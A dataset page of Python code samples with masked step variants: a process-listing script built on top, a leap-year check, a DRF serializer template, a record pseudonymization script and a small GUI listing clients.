AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------------
returns system activity (top)
"""
import collections
import tempfile
import subprocess
import os
import sys
import ujson
if __name__ == '__main__':
fieldnames = None
field_max_width = dict()
result = {'headers': [], 'details': []}
is_header = True
tidpid = dict()
for line in subprocess.run(['/usr/bin/procstat','-ath'], capture_output=True, text=True).stdout.split('\n'):
parts = line.split(maxsplit=2)
if len(parts) > 1:
tidpid[parts[1]] = parts[0]
# grab second display so that CPU time data appears
sp = subprocess.run(['/usr/bin/top','-aHSTn','-d2','999999'], capture_output=True, text=True)
topData = sp.stdout.strip().split('\n\n',2)[-1]
for line in topData.split('\n'):
# end of header, start of top detection
if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:
is_header = False
if is_header:
# parse headers from top command, add to result
if len(line.strip()) > 0:
result['headers'].append(line)
else:
# parse details including fieldnames (leave original)
if fieldnames is None:
fieldnames = ['PID'] + line.split()
else:
tmp = line.split(maxsplit=10)
record = {'C': '0'}
for field_id in range(len(fieldnames)):
fieldname = fieldnames[field_id]
if field_id == 0: # PID
record[fieldname] = tidpid[tmp[0]] if tmp[0] in tidpid else ''
else:
record[fieldname] = tmp[field_id - 1]
if fieldname not in field_max_width or field_max_width[fieldname] < len(record[fieldname]):
field_max_width[fieldname] = len(record[fieldname])
result['details'].append(record)
if len(sys.argv) > 1 and sys.argv[1] == 'json':
# output as json
print(ujson.dumps(result))
else:
# output plain (reconstruct data)
for header_line in result['headers']:
print (header_line)
print ("\n")
if fieldnames is not None:
format_str = ""
header_fields = {}
for fieldname in fieldnames:
format_str = '%s %%(%s)-%ds'%(format_str,fieldname, field_max_width[fieldname]+1)
header_fields[fieldname] = fieldname
print (format_str % header_fields)
for detail_line in result['details']:
print (format_str % detail_line)
|
normal
|
{
"blob_id": "f4ae34be2be2b47b3394e6da751c53c51a1c3174",
"index": 6678,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n fieldnames = None\n field_max_width = dict()\n result = {'headers': [], 'details': []}\n is_header = True\n tidpid = dict()\n for line in subprocess.run(['/usr/bin/procstat', '-ath'],\n capture_output=True, text=True).stdout.split('\\n'):\n parts = line.split(maxsplit=2)\n if len(parts) > 1:\n tidpid[parts[1]] = parts[0]\n sp = subprocess.run(['/usr/bin/top', '-aHSTn', '-d2', '999999'],\n capture_output=True, text=True)\n topData = sp.stdout.strip().split('\\n\\n', 2)[-1]\n for line in topData.split('\\n'):\n if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:\n is_header = False\n if is_header:\n if len(line.strip()) > 0:\n result['headers'].append(line)\n elif fieldnames is None:\n fieldnames = ['PID'] + line.split()\n else:\n tmp = line.split(maxsplit=10)\n record = {'C': '0'}\n for field_id in range(len(fieldnames)):\n fieldname = fieldnames[field_id]\n if field_id == 0:\n record[fieldname] = tidpid[tmp[0]] if tmp[0\n ] in tidpid else ''\n else:\n record[fieldname] = tmp[field_id - 1]\n if fieldname not in field_max_width or field_max_width[\n fieldname] < len(record[fieldname]):\n field_max_width[fieldname] = len(record[fieldname])\n result['details'].append(record)\n if len(sys.argv) > 1 and sys.argv[1] == 'json':\n print(ujson.dumps(result))\n else:\n for header_line in result['headers']:\n print(header_line)\n print('\\n')\n if fieldnames is not None:\n format_str = ''\n header_fields = {}\n for fieldname in fieldnames:\n format_str = '%s %%(%s)-%ds' % (format_str, fieldname, \n field_max_width[fieldname] + 1)\n header_fields[fieldname] = fieldname\n print(format_str % header_fields)\n for detail_line in result['details']:\n print(format_str % detail_line)\n",
"step-3": "<mask token>\nimport collections\nimport tempfile\nimport subprocess\nimport os\nimport sys\nimport ujson\nif __name__ == '__main__':\n fieldnames = None\n field_max_width = dict()\n result = {'headers': [], 'details': []}\n is_header = True\n tidpid = dict()\n for line in subprocess.run(['/usr/bin/procstat', '-ath'],\n capture_output=True, text=True).stdout.split('\\n'):\n parts = line.split(maxsplit=2)\n if len(parts) > 1:\n tidpid[parts[1]] = parts[0]\n sp = subprocess.run(['/usr/bin/top', '-aHSTn', '-d2', '999999'],\n capture_output=True, text=True)\n topData = sp.stdout.strip().split('\\n\\n', 2)[-1]\n for line in topData.split('\\n'):\n if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:\n is_header = False\n if is_header:\n if len(line.strip()) > 0:\n result['headers'].append(line)\n elif fieldnames is None:\n fieldnames = ['PID'] + line.split()\n else:\n tmp = line.split(maxsplit=10)\n record = {'C': '0'}\n for field_id in range(len(fieldnames)):\n fieldname = fieldnames[field_id]\n if field_id == 0:\n record[fieldname] = tidpid[tmp[0]] if tmp[0\n ] in tidpid else ''\n else:\n record[fieldname] = tmp[field_id - 1]\n if fieldname not in field_max_width or field_max_width[\n fieldname] < len(record[fieldname]):\n field_max_width[fieldname] = len(record[fieldname])\n result['details'].append(record)\n if len(sys.argv) > 1 and sys.argv[1] == 'json':\n print(ujson.dumps(result))\n else:\n for header_line in result['headers']:\n print(header_line)\n print('\\n')\n if fieldnames is not None:\n format_str = ''\n header_fields = {}\n for fieldname in fieldnames:\n format_str = '%s %%(%s)-%ds' % (format_str, fieldname, \n field_max_width[fieldname] + 1)\n header_fields[fieldname] = fieldname\n print(format_str % header_fields)\n for detail_line in result['details']:\n print(format_str % detail_line)\n",
"step-4": "#!/usr/local/bin/python3\n\n\"\"\"\n Copyright (c) 2015-2019 Ad Schellevis <[email protected]>\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions are met:\n\n 1. Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n\n 2. Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,\n INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\n AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\n --------------------------------------------------------------------------------------\n returns system activity (top)\n\"\"\"\nimport collections\nimport tempfile\nimport subprocess\nimport os\nimport sys\nimport ujson\n\nif __name__ == '__main__':\n fieldnames = None\n field_max_width = dict()\n result = {'headers': [], 'details': []}\n is_header = True\n tidpid = dict()\n for line in subprocess.run(['/usr/bin/procstat','-ath'], capture_output=True, text=True).stdout.split('\\n'):\n parts = line.split(maxsplit=2)\n if len(parts) > 1:\n tidpid[parts[1]] = parts[0]\n # grab second display so that CPU time data appears\n sp = subprocess.run(['/usr/bin/top','-aHSTn','-d2','999999'], capture_output=True, text=True)\n topData = sp.stdout.strip().split('\\n\\n',2)[-1]\n for line in topData.split('\\n'):\n # end of header, start of top detection\n if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:\n is_header = False\n if is_header:\n # parse headers from top command, add to result\n if len(line.strip()) > 0:\n result['headers'].append(line)\n else:\n # parse details including fieldnames (leave original)\n if fieldnames is None:\n fieldnames = ['PID'] + line.split()\n else:\n tmp = line.split(maxsplit=10)\n record = {'C': '0'}\n for field_id in range(len(fieldnames)):\n fieldname = fieldnames[field_id]\n if field_id == 0: # PID\n record[fieldname] = tidpid[tmp[0]] if tmp[0] in tidpid else ''\n else:\n record[fieldname] = tmp[field_id - 1]\n\n if fieldname not in field_max_width or field_max_width[fieldname] < len(record[fieldname]):\n field_max_width[fieldname] = len(record[fieldname])\n result['details'].append(record)\n\n if len(sys.argv) > 1 and sys.argv[1] == 'json':\n # output as json\n print(ujson.dumps(result))\n else:\n # output plain (reconstruct data)\n for header_line in result['headers']:\n print (header_line)\n print (\"\\n\")\n if fieldnames is not None:\n format_str = \"\"\n header_fields = {}\n for fieldname in fieldnames:\n format_str = '%s %%(%s)-%ds'%(format_str,fieldname, field_max_width[fieldname]+1)\n header_fields[fieldname] = fieldname\n\n print (format_str % header_fields)\n for detail_line in result['details']:\n print (format_str % detail_line)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#returns true if given date is a leap year, false otherwise
def is_leap_year(date):
#if divisible by 400, definitely a leap year
if date % 400 == 0: return True
#if divisible by 100 (and not 400), not a leap year
elif date % 100 == 0: return False
#divisible by 4 and not by 100? leap year
elif date % 4 == 0: return True
#otherwise not a leap year
else : return False
|
normal
|
{
"blob_id": "496d52a984bb8c0e72948ab0c8db5e6035427a68",
"index": 5209,
"step-1": "<mask token>\n",
"step-2": "def is_leap_year(date):\n if date % 400 == 0:\n return True\n elif date % 100 == 0:\n return False\n elif date % 4 == 0:\n return True\n else:\n return False\n",
"step-3": "#returns true if given date is a leap year, false otherwise\n\ndef is_leap_year(date):\n\t#if divisible by 400, definitely a leap year\n\tif date % 400 == 0: return True \n\t#if divisible by 100 (and not 400), not a leap year\n\telif date % 100 == 0: return False \n\t#divisible by 4 and not by 100? leap year\n\telif date % 4 == 0: return True\n\t#otherwise not a leap year \n\telse : return False\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
{% load code_generator_tags %}from rest_framework.serializers import ModelSerializer
{% from_module_import app.name|add:'.models' models %}{% comment %}
{% endcomment %}{% for model in models %}
class {{ model.name }}Serializer(ModelSerializer):
class Meta:
model = {{ model.name }}
depth = 1
fields = (
{% indent_items model.field_names 12 quote='simple' %}
)
read_only_fields = (){% comment %}
{% endcomment %}{% endfor %}
|
normal
|
{
"blob_id": "888ec915d89f1fd8fd6465f1035f7c658af78596",
"index": 6166,
"step-1": "{% load code_generator_tags %}from rest_framework.serializers import ModelSerializer\n{% from_module_import app.name|add:'.models' models %}{% comment %}\n{% endcomment %}{% for model in models %}\n\n\nclass {{ model.name }}Serializer(ModelSerializer):\n class Meta:\n model = {{ model.name }}\n depth = 1\n fields = (\n {% indent_items model.field_names 12 quote='simple' %}\n )\n read_only_fields = (){% comment %}\n{% endcomment %}{% endfor %}\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# This implementation of EPG takes data as XML and produces corresponding pseudonymized data
from lxml import etree
from utils import generalize_or_supress
from hashlib import sha256
from count import getLast, saveCount
import pickle
from hmac import new
from random import random
from json import loads
from bigchain import putonBlockChain, findRecord
def EPGAinit(IDPath):
idt = open(IDPath,'rt').read()
Qti = etree.fromstring(idt)
print('Loading Identifiers')
print('Quasi Specifiers..')
print(', '.join(Qti.keys()))
print('Applying EPGAD_Init on Qti')
gQti = [generalize_or_supress(i[1],i[0]) for i in zip(Qti.keys(),Qti.values())]
hmacKey = ""
for i in gQti:
hmacKey+=i
Gi = sha256(hmacKey.encode()).hexdigest()
countObj = getLast(Gi)
GiObj = pickle.loads(countObj.GiObj)
if GiObj['cQueue'].empty():
if 'count' not in GiObj.keys():
GiObj['count'] = 0
count = 0
else:
GiObj['count']+=1
count = GiObj['count']
countObj.GiObj = pickle.dumps(GiObj)
saveCount(countObj)
prime = 179426549
if count >= prime:
raise Exception('Prime Exceeded')
else:
res = count**2%prime
if count <= prime/2:
GUi = res
else:
GUi = prime - res
Hi = new(Gi.encode() + str(GUi).encode() , hmacKey.encode() , sha256).hexdigest()
return Hi, GUi
def EPGAD(ReportPath, Hi=None, GUi = None):
if Hi == None:
Hi = sha256(str(random()).encode()).hexdigest()
jsn = open(ReportPath, 'rt').read()
jsnld = loads(jsn)
print('Report Loaded')
print('Finding Subject Information')
if 'subject' in jsnld.keys():
print('Subject Information Found')
if 'display' in jsnld['subject'].keys():
jsnld['subject']['display'] = ""
print('Subject Display Found and Suppressed')
if 'reference' in jsnld['subject'].keys():
jsnld['subject']['reference'] = Hi
print('Replacing Identifier with ', Hi)
print('Placing Record Asset on BlockChain')
print()
txid = putonBlockChain(jsnld,Hi, GUi)
print('Status OK. Retrieving Transaction')
findRecord(txid)
if __name__ == "__main__":
Hi, GUi = EPGAinit('sampleIdentity.xml')
EPGAD('sampleReport.json', Hi, GUi)
|
normal
|
{
"blob_id": "8f554166c28fe4c9a093568a97d39b6ba515241b",
"index": 3196,
"step-1": "<mask token>\n\n\ndef EPGAD(ReportPath, Hi=None, GUi=None):\n if Hi == None:\n Hi = sha256(str(random()).encode()).hexdigest()\n jsn = open(ReportPath, 'rt').read()\n jsnld = loads(jsn)\n print('Report Loaded')\n print('Finding Subject Information')\n if 'subject' in jsnld.keys():\n print('Subject Information Found')\n if 'display' in jsnld['subject'].keys():\n jsnld['subject']['display'] = ''\n print('Subject Display Found and Suppressed')\n if 'reference' in jsnld['subject'].keys():\n jsnld['subject']['reference'] = Hi\n print('Replacing Identifier with ', Hi)\n print('Placing Record Asset on BlockChain')\n print()\n txid = putonBlockChain(jsnld, Hi, GUi)\n print('Status OK. Retrieving Transaction')\n findRecord(txid)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef EPGAinit(IDPath):\n idt = open(IDPath, 'rt').read()\n Qti = etree.fromstring(idt)\n print('Loading Identifiers')\n print('Quasi Specifiers..')\n print(', '.join(Qti.keys()))\n print('Applying EPGAD_Init on Qti')\n gQti = [generalize_or_supress(i[1], i[0]) for i in zip(Qti.keys(), Qti.\n values())]\n hmacKey = ''\n for i in gQti:\n hmacKey += i\n Gi = sha256(hmacKey.encode()).hexdigest()\n countObj = getLast(Gi)\n GiObj = pickle.loads(countObj.GiObj)\n if GiObj['cQueue'].empty():\n if 'count' not in GiObj.keys():\n GiObj['count'] = 0\n count = 0\n else:\n GiObj['count'] += 1\n count = GiObj['count']\n countObj.GiObj = pickle.dumps(GiObj)\n saveCount(countObj)\n prime = 179426549\n if count >= prime:\n raise Exception('Prime Exceeded')\n else:\n res = count ** 2 % prime\n if count <= prime / 2:\n GUi = res\n else:\n GUi = prime - res\n Hi = new(Gi.encode() + str(GUi).encode(), hmacKey.encode(), sha256\n ).hexdigest()\n return Hi, GUi\n\n\ndef EPGAD(ReportPath, Hi=None, GUi=None):\n if Hi == None:\n Hi = sha256(str(random()).encode()).hexdigest()\n jsn = open(ReportPath, 'rt').read()\n jsnld = loads(jsn)\n print('Report Loaded')\n print('Finding Subject Information')\n if 'subject' in jsnld.keys():\n print('Subject Information Found')\n if 'display' in jsnld['subject'].keys():\n jsnld['subject']['display'] = ''\n print('Subject Display Found and Suppressed')\n if 'reference' in jsnld['subject'].keys():\n jsnld['subject']['reference'] = Hi\n print('Replacing Identifier with ', Hi)\n print('Placing Record Asset on BlockChain')\n print()\n txid = putonBlockChain(jsnld, Hi, GUi)\n print('Status OK. Retrieving Transaction')\n findRecord(txid)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef EPGAinit(IDPath):\n idt = open(IDPath, 'rt').read()\n Qti = etree.fromstring(idt)\n print('Loading Identifiers')\n print('Quasi Specifiers..')\n print(', '.join(Qti.keys()))\n print('Applying EPGAD_Init on Qti')\n gQti = [generalize_or_supress(i[1], i[0]) for i in zip(Qti.keys(), Qti.\n values())]\n hmacKey = ''\n for i in gQti:\n hmacKey += i\n Gi = sha256(hmacKey.encode()).hexdigest()\n countObj = getLast(Gi)\n GiObj = pickle.loads(countObj.GiObj)\n if GiObj['cQueue'].empty():\n if 'count' not in GiObj.keys():\n GiObj['count'] = 0\n count = 0\n else:\n GiObj['count'] += 1\n count = GiObj['count']\n countObj.GiObj = pickle.dumps(GiObj)\n saveCount(countObj)\n prime = 179426549\n if count >= prime:\n raise Exception('Prime Exceeded')\n else:\n res = count ** 2 % prime\n if count <= prime / 2:\n GUi = res\n else:\n GUi = prime - res\n Hi = new(Gi.encode() + str(GUi).encode(), hmacKey.encode(), sha256\n ).hexdigest()\n return Hi, GUi\n\n\ndef EPGAD(ReportPath, Hi=None, GUi=None):\n if Hi == None:\n Hi = sha256(str(random()).encode()).hexdigest()\n jsn = open(ReportPath, 'rt').read()\n jsnld = loads(jsn)\n print('Report Loaded')\n print('Finding Subject Information')\n if 'subject' in jsnld.keys():\n print('Subject Information Found')\n if 'display' in jsnld['subject'].keys():\n jsnld['subject']['display'] = ''\n print('Subject Display Found and Suppressed')\n if 'reference' in jsnld['subject'].keys():\n jsnld['subject']['reference'] = Hi\n print('Replacing Identifier with ', Hi)\n print('Placing Record Asset on BlockChain')\n print()\n txid = putonBlockChain(jsnld, Hi, GUi)\n print('Status OK. Retrieving Transaction')\n findRecord(txid)\n\n\nif __name__ == '__main__':\n Hi, GUi = EPGAinit('sampleIdentity.xml')\n EPGAD('sampleReport.json', Hi, GUi)\n",
"step-4": "from lxml import etree\nfrom utils import generalize_or_supress\nfrom hashlib import sha256\nfrom count import getLast, saveCount\nimport pickle\nfrom hmac import new\nfrom random import random\nfrom json import loads\nfrom bigchain import putonBlockChain, findRecord\n\n\ndef EPGAinit(IDPath):\n idt = open(IDPath, 'rt').read()\n Qti = etree.fromstring(idt)\n print('Loading Identifiers')\n print('Quasi Specifiers..')\n print(', '.join(Qti.keys()))\n print('Applying EPGAD_Init on Qti')\n gQti = [generalize_or_supress(i[1], i[0]) for i in zip(Qti.keys(), Qti.\n values())]\n hmacKey = ''\n for i in gQti:\n hmacKey += i\n Gi = sha256(hmacKey.encode()).hexdigest()\n countObj = getLast(Gi)\n GiObj = pickle.loads(countObj.GiObj)\n if GiObj['cQueue'].empty():\n if 'count' not in GiObj.keys():\n GiObj['count'] = 0\n count = 0\n else:\n GiObj['count'] += 1\n count = GiObj['count']\n countObj.GiObj = pickle.dumps(GiObj)\n saveCount(countObj)\n prime = 179426549\n if count >= prime:\n raise Exception('Prime Exceeded')\n else:\n res = count ** 2 % prime\n if count <= prime / 2:\n GUi = res\n else:\n GUi = prime - res\n Hi = new(Gi.encode() + str(GUi).encode(), hmacKey.encode(), sha256\n ).hexdigest()\n return Hi, GUi\n\n\ndef EPGAD(ReportPath, Hi=None, GUi=None):\n if Hi == None:\n Hi = sha256(str(random()).encode()).hexdigest()\n jsn = open(ReportPath, 'rt').read()\n jsnld = loads(jsn)\n print('Report Loaded')\n print('Finding Subject Information')\n if 'subject' in jsnld.keys():\n print('Subject Information Found')\n if 'display' in jsnld['subject'].keys():\n jsnld['subject']['display'] = ''\n print('Subject Display Found and Suppressed')\n if 'reference' in jsnld['subject'].keys():\n jsnld['subject']['reference'] = Hi\n print('Replacing Identifier with ', Hi)\n print('Placing Record Asset on BlockChain')\n print()\n txid = putonBlockChain(jsnld, Hi, GUi)\n print('Status OK. Retrieving Transaction')\n findRecord(txid)\n\n\nif __name__ == '__main__':\n Hi, GUi = EPGAinit('sampleIdentity.xml')\n EPGAD('sampleReport.json', Hi, GUi)\n",
"step-5": "# This implementation of EPG takes data as XML and produces corresponding pseudonymized data\n\nfrom lxml import etree\nfrom utils import generalize_or_supress\nfrom hashlib import sha256\nfrom count import getLast, saveCount\nimport pickle\nfrom hmac import new\nfrom random import random\nfrom json import loads\nfrom bigchain import putonBlockChain, findRecord\n\ndef EPGAinit(IDPath):\n\tidt = open(IDPath,'rt').read()\n\n\tQti = etree.fromstring(idt)\n\n\tprint('Loading Identifiers')\n\tprint('Quasi Specifiers..')\n\tprint(', '.join(Qti.keys()))\n\tprint('Applying EPGAD_Init on Qti')\n\t\n\tgQti = [generalize_or_supress(i[1],i[0]) for i in zip(Qti.keys(),Qti.values())]\n\n\thmacKey = \"\"\n\n\tfor i in gQti:\n\t\thmacKey+=i\n\n\tGi = sha256(hmacKey.encode()).hexdigest()\n\n\tcountObj = getLast(Gi)\n\tGiObj = pickle.loads(countObj.GiObj)\n\n\tif GiObj['cQueue'].empty():\n\t\tif 'count' not in GiObj.keys():\n\t\t\tGiObj['count'] = 0\n\t\t\tcount = 0\n\t\telse:\n\t\t\tGiObj['count']+=1\n\t\t\tcount = GiObj['count']\n\t\tcountObj.GiObj = pickle.dumps(GiObj)\n\t\tsaveCount(countObj)\n\n\tprime = 179426549\n\n\tif count >= prime:\n\t\t raise Exception('Prime Exceeded')\n\n\telse:\n\t\tres = count**2%prime\n\t\tif count <= prime/2:\n\t\t\tGUi = res\n\t\telse:\n\t\t\tGUi = prime - res\n\n\tHi = new(Gi.encode() + str(GUi).encode() , hmacKey.encode() , sha256).hexdigest()\n\treturn Hi, GUi\n\n\ndef EPGAD(ReportPath, Hi=None, GUi = None):\n\tif Hi == None:\n\t\tHi = sha256(str(random()).encode()).hexdigest()\n\tjsn = open(ReportPath, 'rt').read()\n\tjsnld = loads(jsn)\n\tprint('Report Loaded')\n\tprint('Finding Subject Information')\n\tif 'subject' in jsnld.keys():\n\t\tprint('Subject Information Found')\n\t\tif 'display' in jsnld['subject'].keys():\n\t\t\tjsnld['subject']['display'] = \"\"\n\t\t\tprint('Subject Display Found and Suppressed')\n\t\tif 'reference' in jsnld['subject'].keys():\n\t\t\tjsnld['subject']['reference'] = Hi\n\t\t\tprint('Replacing Identifier with ', Hi)\n\n\tprint('Placing Record Asset on BlockChain')\n\tprint()\n\ttxid = putonBlockChain(jsnld,Hi, GUi)\n\tprint('Status OK. Retrieving Transaction')\n\tfindRecord(txid)\n\nif __name__ == \"__main__\":\n\tHi, GUi = EPGAinit('sampleIdentity.xml')\n\tEPGAD('sampleReport.json', Hi, GUi)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import PySimpleGUI as sg
class TelaLisatrClientes():
def __init__(self):
self.__window = None
def init_components(self, lista_clientes):
layout = [
[sg.Text('Dados do cliente')],
[sg.Listbox(values=lista_clientes, size=(60, 10))],
[sg.Submit()]
]
self.__window = sg.Window('Lista de clientes').Layout(layout)
def lista_clientes(self, lista_clientes):
self.init_components(lista_clientes)
button, values = self.__window.Read()
self.__window.Close()
return button, values
|
normal
|
{
"blob_id": "624b34d160ea6db4f5249544f1614a20f506ca9e",
"index": 895,
"step-1": "<mask token>\n\n\nclass TelaLisatrClientes:\n <mask token>\n\n def init_components(self, lista_clientes):\n layout = [[sg.Text('Dados do cliente')], [sg.Listbox(values=\n lista_clientes, size=(60, 10))], [sg.Submit()]]\n self.__window = sg.Window('Lista de clientes').Layout(layout)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TelaLisatrClientes:\n\n def __init__(self):\n self.__window = None\n\n def init_components(self, lista_clientes):\n layout = [[sg.Text('Dados do cliente')], [sg.Listbox(values=\n lista_clientes, size=(60, 10))], [sg.Submit()]]\n self.__window = sg.Window('Lista de clientes').Layout(layout)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass TelaLisatrClientes:\n\n def __init__(self):\n self.__window = None\n\n def init_components(self, lista_clientes):\n layout = [[sg.Text('Dados do cliente')], [sg.Listbox(values=\n lista_clientes, size=(60, 10))], [sg.Submit()]]\n self.__window = sg.Window('Lista de clientes').Layout(layout)\n\n def lista_clientes(self, lista_clientes):\n self.init_components(lista_clientes)\n button, values = self.__window.Read()\n self.__window.Close()\n return button, values\n",
"step-4": "import PySimpleGUI as sg\n\n\nclass TelaLisatrClientes:\n\n def __init__(self):\n self.__window = None\n\n def init_components(self, lista_clientes):\n layout = [[sg.Text('Dados do cliente')], [sg.Listbox(values=\n lista_clientes, size=(60, 10))], [sg.Submit()]]\n self.__window = sg.Window('Lista de clientes').Layout(layout)\n\n def lista_clientes(self, lista_clientes):\n self.init_components(lista_clientes)\n button, values = self.__window.Read()\n self.__window.Close()\n return button, values\n",
"step-5": "import PySimpleGUI as sg\n\nclass TelaLisatrClientes():\n\n def __init__(self):\n self.__window = None\n\n def init_components(self, lista_clientes):\n\n layout = [\n [sg.Text('Dados do cliente')],\n [sg.Listbox(values=lista_clientes, size=(60, 10))],\n [sg.Submit()]\n ]\n\n self.__window = sg.Window('Lista de clientes').Layout(layout)\n\n def lista_clientes(self, lista_clientes):\n\n self.init_components(lista_clientes)\n\n button, values = self.__window.Read()\n\n self.__window.Close()\n\n return button, values\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.